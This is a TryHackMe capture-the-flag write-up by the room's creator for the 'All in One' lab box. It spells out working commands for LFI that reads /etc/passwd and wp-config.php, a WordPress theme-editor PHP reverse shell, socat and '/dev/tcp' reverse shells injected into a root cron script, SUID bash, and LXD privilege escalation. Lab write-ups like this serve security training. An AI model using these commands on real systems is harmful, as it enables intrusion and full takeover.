All in One TryHackMe Write-up

Image for post
Image for post

Source: TryHackMe

Room: All in One https://tryhackme.com/room/allinonemj

Difficulty: Easy/Medium

Creator: Me, i7m4d

This box’s intention is to help you practice several ways in exploiting a system. There is few intended paths to exploit it and few unintended paths to get root.

What you will see:

  1. Enumeration
  2. Decryption
  3. Reverse shell from wordpress
  4. Finding hidden password
  5. Exploiting LFI
  6. Privilege escalation using SUID
  7. Privilege escalation using cron job
  8. Privilege escalation using LXD

Enumeration:

First step in almost every box, running an nmap scan.

Command: nmap -p- -A -T4 (ip)

As shown in the nmap scan, There are three open ports:

Image for post
Image for post

21: ftp

22: SSH

80: web-server

FTP Port 21:

We can log into ftp using the username and password as Anonymous as shown in the nmap results.

Tip: You can directly log in using only the username Anonymous and hit Enter when prompted for the password.

Command: ftp (ip)

There is nothing useful in FTP, lets move on

Image for post
Image for post

Web Port 80:

First thing first, lets run a dir scan and check if there is any hidden directories

Command: gobuster dir -w (wordlist) -u (url)

As shown, we have found two directories:

Wordpress and Hackathons

Heading into the Hackathons page says something about hating the smell of vinegar, looking at the page source reveals an encoded text. The hint in the page might meant to use vigenere decoding to decrpt the text plus using the keyword under the encoded text as a key to decode it. 💭 💭 💭

Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

And yes ! we were able to decrpt it and got what looks like a password, we will leave it there for now. By the way, I have tried to ssh using the password found yet it was incorrect🤔.

Accessing Wordpress obviously gave us and wordpress page, let us run wpscan to check for any vulnerabilities and enumerate users.

Image for post
Image for post

Command: wpscan — url (ip)/wordpress -e u

Command: wpscan — url (ip)/wordpress -e ap

  • e enumerate
  • u users
  • ap all plugins
Image for post
Image for post
Image for post
Image for post

Looking at the results, we find two vulnerabilities and a username:

  1. Mail Masta which is LFI (Local File Inclusion)

Source: https://www.exploit-db.com/exploits/40290

2. Reflex Gallery (Arbitary File Upload)

Source: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload

3. A username which is elyana

Exploitation:

Method 1💭:

Mail Masta (LFI):

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

To test for LFI we will first try to see if we can access users accounts file:

http://ip/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Image for post
Image for post

And yes this was executed successfully and we are able to see the contents of /etc/passwd.

Now let us try and get the database’s config file using:

http://ip/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

Image for post
Image for post

We got the config file however it is encoded in base64, decoding it reveals the wordpress username and password:

Image for post
Image for post

Now we can just head and log into the wordpress and get a php reverse shell. To do so, we will go to Appearance > Theme Editor > On the right side click on 404 Template and paste our php reverse shell code.

Image for post
Image for post

Lets us run the file from where it is stored and start netcat to listen for incoming connections

Executing the file:

http://ip/wordpress/wp-content/themes/twentytwenty/404.php

Command to start netcat: nc -nlvp 9001

Image for post
Image for post

We got a shell !!!

Spawn a better shell using: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Method 2 (Metasploit)💭:

Reflex Gallery (File upload)

I will leave this up to you to try and exploit it the easier way using metasploit frame work.

Privilege Escalation to User:

Now that we have got a shell, lets grab our user.txt !!!

Image for post
Image for post

Urm🤔, I guess we cant access user.txt as we do not have permission yet. However, there is a hint file saying that elyana’s password is hidden somewhere on the system.

To find it, we will run a find command to see if she owns any file or directory:

Command: find / -user elyana -type f 2>&1 | grep -v “Permission” | grep -v “No such”

Image for post
Image for post

Looks like there is file called private.txt, reading it gives us the password of elyana’s user account.😍

Image for post
Image for post

Using the password found we were able to switch to elyana’s account. But what can we do more while we own elyana?

Checking elyana’s id shows that she is in sudo and lxd group. This is interesting!🤯

Image for post
Image for post

SSH

Now that we have the user’s password we can directly ssh into it and continue with our privilege escalation.

Image for post
Image for post

Privilege Escalation to root:

Method 1💭:

Anyways for now, running sudo -l says that when we correctly execute /usr/bin/socat we will get a shell as root. Lets do it !

In our machine we will run this command: socat file:`tty`,raw,echo=0 tcp-listen:(port)

Image for post
Image for post

In elyana’s machine we will run this command: sudo socat tcp-connect:(your machine’s ip):(port) exec:bash,pty,stderr,setsid,sigint,sane

Image for post
Image for post

And we got rooooooot 😍!!

Image for post
Image for post

Method 2💭:

Running LinEum script we have found some interesting SUID binaries that when we execute them we will get a shell as root.

Image for post
Image for post

Manually looking at SUID binaries using the command: find / -perm -u=s -type f 2>/dev/null

Image for post
Image for post

The second one we were able to do it successfully, lets try the first one now !

Btw, you can look for almost any SUID binaries from GTFOBins and it will provide you with excellent explanation on how you can priv esc using SUID binaries.

Source: https://gtfobins.github.io/

We will run this cute short command that we give us root access, because in the permissions it is -rwsr-sr-x in other words, we can execute it and get root.

Command: /bin/bash -p

Image for post
Image for post

And once again we are ROOOOOOOOT 😍😍!

Method 3💭:

In this method, we will get a reverse shell as root. This is possible because there is a bash script owned by root that executes every minute. We can verify it by checking the crontab.

Command: cat /etc/crontab

Image for post
Image for post

Looking at the script, it does not really do nothing however, we can insert again a cute short code using bash and we will get a reverse shell.

Image for post
Image for post

Inject this reverse shell code into the script: bash -i >& /dev/tcp/ip/port 0>&1

Image for post
Image for post

Our machine start netcat: nc -nlvp 9002

Image for post
Image for post

We are roooooooot’in again 😍😍😍!!!

Method 4💭:

Remember when we saw that elyana was in lxd group? Yup, it is this time when it comes in handy and we will exploit it like nothing !

To do so, first we will download lxd builder, create an image, upload the file to the victim using python server, import and execute the image.

Download the repo using git on your machine: git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Image for post
Image for post
Image for post
Image for post

After creating it, upload it to the victim using python server.

On your machine: sudo python -m SimpleHTTPServer

On victim machine: go to the tmp directory and get the tar using

wget http://(your machine ip):8000/********.tar.gz

Image for post
Image for post

Now that we have got the file, we will add it as an image to LXD using:

lxc image import ./******************.tar.gz — alias alpine

Image for post
Image for post

List the lxc images to see if it was imported successfully like so:

lxc image list

Image for post
Image for post

Yup, it is imported. Now we will just have to execute it like so and then navigate to /mnt/root to see the system’s files:

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

id

/mnt/root/root

Image for post
Image for post

And guess what again? Yeah Yeah we just got root using LXD 😍😍😍😍 !!!

Finally the user.txt and root.txt are encoded using base64, go ahead decode them, and submit your flags 🚩🚩🚩!

Image for post
Image for post
Image for post
Image for post

This was a fun box to be honest and it contains some of the most important ways into exploiting a system. I enjoyed creating the box and writing up to it. It took me three to four days to complete everything so pardon me if I have done any silly mistakes.😎

Thank you for reading and I hope you have enjoyed this room and post 👏🏻 !

Another write up by me😎: https://medium.com/@i7m4d/bounty-hacker-write-up-tryhackme-4afca1389f5a

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store